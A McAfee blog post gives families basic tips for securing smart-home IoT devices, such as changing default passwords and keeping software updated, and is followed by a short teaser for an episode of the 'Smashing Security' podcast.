A Gartner report estimated there were 8.4 billion connected “things” in 2017, with as many as 20 billion expected by 2020. The capabilities of some IoT devices are staggering and, frankly, a bit frightening. The data collection abilities of smart devices and services on the market are far greater than most of us realize. Rooms, devices, and apps come equipped with sensors and controls that can gather information about consumers and pass it on to third parties.

Lock down IoT devices:

  • Research product security. With so many cool products on the market, it’s easy to be impulsive and skip your research, but don’t. Read reviews of a product’s security (or lack thereof). Going with a name brand that has a proven security track record and has closed past security gaps may be the better choice.
  • Create new passwords. Almost every IoT device comes with a factory default password. Hackers know these passwords and will use them to break into your devices and gain access to your data. Take the time to go into the product settings (general and advanced) and create a unique, strong password.
  • Keep product software up-to-date. Manufacturers often release software updates to protect customers against vulnerabilities and new threats. Set your device to auto-update, if possible, so you always have the latest, safest upgrade.
  • Get an extra layer of security. Managing and protecting multiple devices in our already busy lives is not an easy task. To make sure you are protected, consider investing in software that gives you antivirus, identity, and privacy protection for your PCs, Macs, smartphones, and tablets, all in one subscription.
  • Stay informed. Think about it: crooks make it a point to stay current on IoT news, so shouldn’t we? Stay a step ahead by keeping an eye out for any news that may affect your IoT security (or specific products), for instance by setting up a Google alert.

A connected life is a good life, no doubt. The only drawback is that criminals fully understand our growing dependence on and affection for IoT devices and spend most of their time looking for vulnerabilities. Once they crack our network from one angle, they can reach other data-rich devices and possibly access private and financial data.

As Yoda says, “with much power comes much responsibility.” Discuss with your family the risks that come with smart devices and how to work together to lock down your always-evolving, hyper-connected way of life.

Do you enjoy podcasts and wish you could find one that helps you keep up with digital trends and the latest gadgets? Then give McAfee’s podcast Hackable a try.

 

Toni Birdsong is a Family Safety Evangelist to McAfee. You can find her on Twitter @McAfee_Family. (Disclosures)

 

The post IoT Lockdown: Ways to Secure Your Family’s Digital Home and Lifestyle appeared first on McAfee Blogs.

Smashing Security #102: Ethical dilemmas, Girl Scouts, and porn-loving US officials

Who deserves to die in a driverless car crash? Who has been sniffing around the Girl Scouts’ email account? And just how long would it take for a geologist to visit 9,000 adult web pages?

All this and much more is discussed in the latest edition of the award-winning “Smashing Security” podcast by computer security veterans Graham Cluley and Carole Theriault, joined this week by journalist and “Friends” fan Dan Raywood.